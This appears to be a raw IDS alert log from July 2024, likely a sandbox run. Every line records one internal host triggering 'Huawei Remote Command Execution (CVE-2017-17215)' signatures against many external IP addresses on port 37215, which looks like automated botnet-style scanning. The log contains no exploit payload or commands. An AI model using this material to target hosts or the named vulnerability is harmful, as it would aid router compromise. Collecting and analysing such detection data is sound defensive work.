                                                    07/10/24-08:27:30.489960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5238637215192.168.2.14157.142.11.132
                                                    07/10/24-08:26:20.187886TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5038037215192.168.2.14157.210.227.125
                                                    07/10/24-08:26:29.761571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4108237215192.168.2.14157.116.220.8
                                                    07/10/24-08:26:49.836491TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3659437215192.168.2.1441.84.146.121
                                                    07/10/24-08:26:33.252785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3858237215192.168.2.14197.155.39.214
                                                    07/10/24-08:26:47.914278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5952237215192.168.2.14206.2.106.157
                                                    07/10/24-08:26:59.837410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3902837215192.168.2.1441.13.79.109
                                                    07/10/24-08:27:02.845496TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4877037215192.168.2.14157.139.233.231
                                                    07/10/24-08:26:45.587142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3956637215192.168.2.1468.157.88.21
                                                    07/10/24-08:27:28.108861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5636037215192.168.2.1441.112.235.49
                                                    07/10/24-08:26:48.030599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4358837215192.168.2.14204.147.71.213
                                                    07/10/24-08:27:30.542480TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5072437215192.168.2.14136.178.135.153
                                                    07/10/24-08:26:45.628339TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3477037215192.168.2.1441.230.251.116
                                                    07/10/24-08:27:27.103882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4089437215192.168.2.1441.13.81.123
                                                    07/10/24-08:26:28.644111TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5241637215192.168.2.14157.74.56.227
                                                    07/10/24-08:26:11.178483TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4913637215192.168.2.14158.13.46.18
                                                    07/10/24-08:26:25.453696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4319637215192.168.2.14197.39.6.74
                                                    07/10/24-08:26:26.603231TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4022437215192.168.2.14157.99.6.79
                                                    07/10/24-08:26:36.394343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4296837215192.168.2.14157.233.153.171
                                                    07/10/24-08:26:11.624081TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4610237215192.168.2.14212.2.176.188
                                                    07/10/24-08:26:38.637224TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5679037215192.168.2.14157.133.199.6
                                                    07/10/24-08:26:53.177713TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4239037215192.168.2.1441.40.43.112
                                                    07/10/24-08:26:34.264722TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4940437215192.168.2.14197.82.63.213
                                                    07/10/24-08:27:17.099903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4328837215192.168.2.14197.172.117.41
                                                    07/10/24-08:27:23.969982TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3313437215192.168.2.1441.165.56.164
                                                    07/10/24-08:26:26.563036TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5614437215192.168.2.14223.246.69.216
                                                    07/10/24-08:26:52.028986TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4971437215192.168.2.1442.201.126.146
                                                    07/10/24-08:26:28.912225TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4511837215192.168.2.14197.100.216.34
                                                    07/10/24-08:27:08.366132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5153437215192.168.2.14157.222.112.220
                                                    07/10/24-08:26:45.658661TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3873437215192.168.2.14157.92.55.194
                                                    07/10/24-08:26:11.622181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3560437215192.168.2.1441.216.184.167
                                                    07/10/24-08:26:45.575207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5331037215192.168.2.14157.219.208.209
                                                    07/10/24-08:27:02.868387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6014637215192.168.2.1441.125.140.15
                                                    07/10/24-08:26:15.806534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5586037215192.168.2.14118.186.32.179
                                                    07/10/24-08:26:57.525834TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5897837215192.168.2.14157.135.176.113
                                                    07/10/24-08:27:05.214237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5101637215192.168.2.148.85.176.76
                                                    07/10/24-08:26:55.400410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3798437215192.168.2.1441.101.69.12
                                                    07/10/24-08:26:23.301288TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3530637215192.168.2.14197.227.39.8
                                                    07/10/24-08:26:43.888134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5148837215192.168.2.1441.55.119.183
                                                    07/10/24-08:26:28.649292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4221837215192.168.2.14157.17.146.163
                                                    07/10/24-08:27:02.985576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5771437215192.168.2.14197.63.24.146
                                                    07/10/24-08:26:11.469392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3670837215192.168.2.14101.129.97.51
                                                    07/10/24-08:26:13.778157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4302237215192.168.2.1441.45.230.71
                                                    07/10/24-08:26:15.869834TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5271437215192.168.2.14157.67.181.239
                                                    07/10/24-08:26:20.117679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4361037215192.168.2.1441.20.9.238
                                                    07/10/24-08:26:36.441916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5865037215192.168.2.1441.65.3.231
                                                    07/10/24-08:26:59.879112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3821637215192.168.2.1441.21.16.168
                                                    07/10/24-08:26:28.886880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3642837215192.168.2.14157.160.4.24
                                                    07/10/24-08:26:43.848848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3785437215192.168.2.14157.114.175.151
                                                    07/10/24-08:27:33.897517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5534237215192.168.2.14197.224.13.97
                                                    07/10/24-08:26:25.489783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3795237215192.168.2.14157.192.146.105
                                                    07/10/24-08:26:28.850187TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4792237215192.168.2.14197.59.35.6
                                                    07/10/24-08:27:28.160478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5931437215192.168.2.14197.137.9.194
                                                    07/10/24-08:27:24.985108TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4519837215192.168.2.14197.76.107.115
                                                    07/10/24-08:27:05.096875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5242437215192.168.2.14197.41.176.182
                                                    07/10/24-08:26:43.841867TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4147637215192.168.2.14157.211.174.233
                                                    07/10/24-08:26:47.758583TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3284237215192.168.2.14157.85.75.137
                                                    07/10/24-08:26:43.613127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3432637215192.168.2.14197.177.105.202
                                                    07/10/24-08:27:28.134313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6021037215192.168.2.1441.238.245.165
                                                    07/10/24-08:27:19.168887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5623037215192.168.2.1441.189.138.151
                                                    07/10/24-08:26:26.603545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4984437215192.168.2.1441.220.21.211
                                                    07/10/24-08:26:41.487331TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3683637215192.168.2.14157.1.221.219
                                                    07/10/24-08:27:30.523582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4521437215192.168.2.14197.43.248.232
                                                    07/10/24-08:27:22.571545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4293237215192.168.2.14157.154.246.111
                                                    07/10/24-08:26:22.272664TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4102837215192.168.2.1477.45.246.95
                                                    07/10/24-08:27:07.384397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3579637215192.168.2.14197.65.39.43
                                                    07/10/24-08:26:11.542221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5212237215192.168.2.14193.130.43.8
                                                    07/10/24-08:26:52.073471TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5479237215192.168.2.14197.227.160.222
                                                    07/10/24-08:26:55.433645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4468637215192.168.2.14157.75.202.43
                                                    07/10/24-08:26:59.736311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5930037215192.168.2.14157.120.215.191
                                                    07/10/24-08:26:22.242541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5266237215192.168.2.14187.181.226.105
                                                    07/10/24-08:26:43.885444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4140637215192.168.2.14157.178.102.230
                                                    07/10/24-08:27:19.277665TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4584237215192.168.2.1441.168.148.144
                                                    07/10/24-08:26:34.256446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5846437215192.168.2.14197.215.86.243
                                                    07/10/24-08:26:15.868570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5857637215192.168.2.1441.59.24.76
                                                    07/10/24-08:26:25.423127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5383037215192.168.2.14107.76.241.12
                                                    07/10/24-08:26:57.680054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5509237215192.168.2.14157.31.52.169
                                                    07/10/24-08:27:07.397077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5860037215192.168.2.14197.14.222.171
                                                    07/10/24-08:27:23.491669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4602037215192.168.2.14157.219.72.182
                                                    07/10/24-08:27:28.130365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3884837215192.168.2.1441.232.53.11
                                                    07/10/24-08:27:31.478959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4789637215192.168.2.14197.14.226.175
                                                    07/10/24-08:27:36.285342TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5563437215192.168.2.14197.161.103.174
                                                    07/10/24-08:26:18.010267TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5361437215192.168.2.14186.69.250.127
                                                    07/10/24-08:27:05.240759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3445037215192.168.2.1441.40.118.150
                                                    07/10/24-08:26:17.950473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4999237215192.168.2.14197.23.198.169
                                                    07/10/24-08:26:53.198979TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3414837215192.168.2.1441.14.193.171
                                                    07/10/24-08:27:14.885760TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4627637215192.168.2.14157.90.49.172
                                                    07/10/24-08:26:47.739348TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4521037215192.168.2.1441.244.75.45
                                                    07/10/24-08:27:11.514897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5744237215192.168.2.14197.182.101.182
                                                    07/10/24-08:26:11.494095TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4087037215192.168.2.1441.122.12.150
                                                    07/10/24-08:26:59.596849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3303237215192.168.2.14163.95.126.149
                                                    07/10/24-08:26:38.518118TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3699837215192.168.2.14157.57.108.16
                                                    07/10/24-08:27:19.174842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3641437215192.168.2.14207.92.180.213
                                                    07/10/24-08:26:28.792131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4317437215192.168.2.14197.128.149.161
                                                    07/10/24-08:26:52.028986TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3720437215192.168.2.14197.184.197.233
                                                    07/10/24-08:27:08.379030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5971637215192.168.2.14221.82.210.152
                                                    07/10/24-08:26:22.256237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5662037215192.168.2.1441.98.196.196
                                                    07/10/24-08:26:29.810736TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6018837215192.168.2.1441.43.175.42
                                                    07/10/24-08:27:20.483063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3376037215192.168.2.14157.42.213.141
                                                    07/10/24-08:26:20.118074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3948837215192.168.2.14156.232.84.203
                                                    07/10/24-08:26:28.648107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5216637215192.168.2.14129.4.116.239
                                                    07/10/24-08:26:43.655198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5832237215192.168.2.1441.225.174.241
                                                    07/10/24-08:26:59.526504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5852837215192.168.2.14157.63.127.4
                                                    07/10/24-08:27:13.942204TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5603637215192.168.2.14157.14.146.37
                                                    07/10/24-08:27:17.017003TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5400637215192.168.2.1441.140.59.155
                                                    07/10/24-08:26:23.353387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5223837215192.168.2.14157.21.144.112
                                                    07/10/24-08:26:17.984415TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5352037215192.168.2.1441.160.243.104
                                                    07/10/24-08:27:17.071295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5626437215192.168.2.14151.51.23.52
                                                    07/10/24-08:27:27.063250TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5357437215192.168.2.14157.232.36.64
                                                    07/10/24-08:26:11.617783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5471837215192.168.2.14197.70.178.22
                                                    07/10/24-08:26:20.132351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6067437215192.168.2.14197.48.58.249
                                                    07/10/24-08:27:32.619838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4922437215192.168.2.1441.80.66.11
                                                    07/10/24-08:27:22.903696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4416637215192.168.2.14157.36.154.238
                                                    07/10/24-08:27:30.546490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6056637215192.168.2.1447.60.199.255
                                                    07/10/24-08:26:13.847797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4734437215192.168.2.14157.58.224.54
                                                    07/10/24-08:26:25.507249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4167037215192.168.2.1441.21.235.28
                                                    07/10/24-08:26:29.865675TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4547837215192.168.2.1441.144.179.206
                                                    07/10/24-08:27:27.160309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4035037215192.168.2.14157.175.241.218
                                                    07/10/24-08:27:10.641712TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3975837215192.168.2.1441.252.72.131
                                                    07/10/24-08:26:59.577459TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5396237215192.168.2.1441.31.215.223
                                                    07/10/24-08:26:26.521470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4306837215192.168.2.14105.2.1.2
                                                    07/10/24-08:27:30.428214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3594037215192.168.2.14197.224.140.96
                                                    07/10/24-08:26:22.219271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4905437215192.168.2.14157.216.105.18
                                                    07/10/24-08:26:49.853499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5118437215192.168.2.14121.114.55.252
                                                    07/10/24-08:26:17.992785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4292637215192.168.2.1441.80.228.39
                                                    07/10/24-08:26:36.431217TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3362437215192.168.2.14157.208.20.186
                                                    07/10/24-08:26:33.175812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5854837215192.168.2.14151.239.82.219
                                                    07/10/24-08:26:55.438982TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6057037215192.168.2.1441.33.177.157
                                                    07/10/24-08:27:33.850046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4786837215192.168.2.14197.207.79.207
                                                    07/10/24-08:27:14.853796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3395437215192.168.2.14197.213.55.176
                                                    07/10/24-08:27:22.922024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3536637215192.168.2.14157.101.176.177
                                                    07/10/24-08:26:41.494208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3636437215192.168.2.14197.88.57.166
                                                    07/10/24-08:26:26.620652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5434837215192.168.2.14157.154.86.171
                                                    07/10/24-08:27:24.927319TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3533637215192.168.2.14197.33.73.89
                                                    07/10/24-08:26:17.994828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5103637215192.168.2.14197.9.101.252
                                                    07/10/24-08:26:31.078993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5045437215192.168.2.14157.240.32.46
                                                    07/10/24-08:27:10.632991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5978037215192.168.2.1441.247.14.126
                                                    07/10/24-08:27:11.503966TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4093837215192.168.2.14197.224.12.45
                                                    07/10/24-08:26:42.379433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4593637215192.168.2.14197.133.132.134
                                                    07/10/24-08:26:55.373559TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3428037215192.168.2.1466.14.79.15
                                                    07/10/24-08:26:13.849175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5677437215192.168.2.14197.10.42.115
                                                    07/10/24-08:26:28.808876TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5311637215192.168.2.14197.5.217.150
                                                    07/10/24-08:26:29.865675TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4826237215192.168.2.14166.203.102.127
                                                    07/10/24-08:27:23.848972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3472637215192.168.2.14197.248.112.150
                                                    07/10/24-08:27:33.802281TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5505037215192.168.2.14157.93.71.248
                                                    07/10/24-08:26:38.524436TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5195037215192.168.2.1470.32.202.129
                                                    07/10/24-08:27:14.878882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5987237215192.168.2.1441.79.38.167
                                                    07/10/24-08:27:07.249452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4690837215192.168.2.14141.152.16.207
                                                    07/10/24-08:27:23.959862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4646637215192.168.2.14197.190.246.202
                                                    07/10/24-08:26:26.563571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4262837215192.168.2.1441.41.97.3
                                                    07/10/24-08:27:22.910234TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4688437215192.168.2.1441.204.124.253
                                                    07/10/24-08:26:53.171855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4310437215192.168.2.1441.36.227.150
                                                    07/10/24-08:27:30.538484TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3619037215192.168.2.14172.152.170.105
                                                    07/10/24-08:26:53.114397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4671837215192.168.2.14197.248.182.182
                                                    07/10/24-08:26:59.539411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5623237215192.168.2.14173.164.30.61
                                                    07/10/24-08:27:33.746673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4960237215192.168.2.14140.186.173.225
                                                    07/10/24-08:27:23.853234TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4327237215192.168.2.14190.151.3.45
                                                    07/10/24-08:26:23.297674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3433437215192.168.2.14157.125.143.228
                                                    07/10/24-08:26:26.621338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5869237215192.168.2.1452.174.49.219
                                                    07/10/24-08:26:11.659396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4379437215192.168.2.1441.197.240.187
                                                    07/10/24-08:26:13.804743TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4067837215192.168.2.14157.90.123.92
                                                    07/10/24-08:26:43.554378TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4683237215192.168.2.14157.184.194.84
                                                    07/10/24-08:27:20.483733TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3468837215192.168.2.14197.186.254.177
                                                    07/10/24-08:26:45.612875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4913837215192.168.2.14197.221.150.24
                                                    07/10/24-08:26:20.143490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5001237215192.168.2.14157.9.96.190
                                                    07/10/24-08:26:20.139593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4131037215192.168.2.14156.164.211.96
                                                    07/10/24-08:27:19.273517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4162037215192.168.2.14197.237.0.2
                                                    07/10/24-08:26:28.912522TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4468037215192.168.2.14197.46.253.151
                                                    07/10/24-08:27:05.109463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4111037215192.168.2.1441.120.194.28
                                                    07/10/24-08:27:02.710237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4546837215192.168.2.1441.211.103.248
                                                    07/10/24-08:26:49.834226TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4085437215192.168.2.1441.209.232.81
                                                    07/10/24-08:26:38.608013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3559437215192.168.2.14197.45.92.129
                                                    07/10/24-08:26:55.439296TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5323637215192.168.2.1441.10.134.48
                                                    07/10/24-08:26:28.866778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3693437215192.168.2.14173.102.133.179
                                                    07/10/24-08:26:33.240926TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5530637215192.168.2.1441.16.250.178
                                                    07/10/24-08:27:33.977851TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6095237215192.168.2.14157.73.175.35
                                                    07/10/24-08:27:08.422156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3922837215192.168.2.1441.199.154.246
                                                    07/10/24-08:26:59.631449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3705637215192.168.2.14157.20.255.181
                                                    07/10/24-08:27:13.905165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4670037215192.168.2.14197.46.75.65
                                                    07/10/24-08:26:14.625043TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4563237215192.168.2.1441.102.253.177
                                                    07/10/24-08:27:30.461337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4751237215192.168.2.14197.64.56.219
                                                    07/10/24-08:26:42.409730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4370837215192.168.2.14115.95.110.205
                                                    07/10/24-08:26:57.667914TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3278237215192.168.2.14157.24.154.214
                                                    07/10/24-08:26:59.645443TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3475437215192.168.2.1482.132.109.224
                                                    07/10/24-08:27:07.351462TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5837837215192.168.2.1441.143.105.130
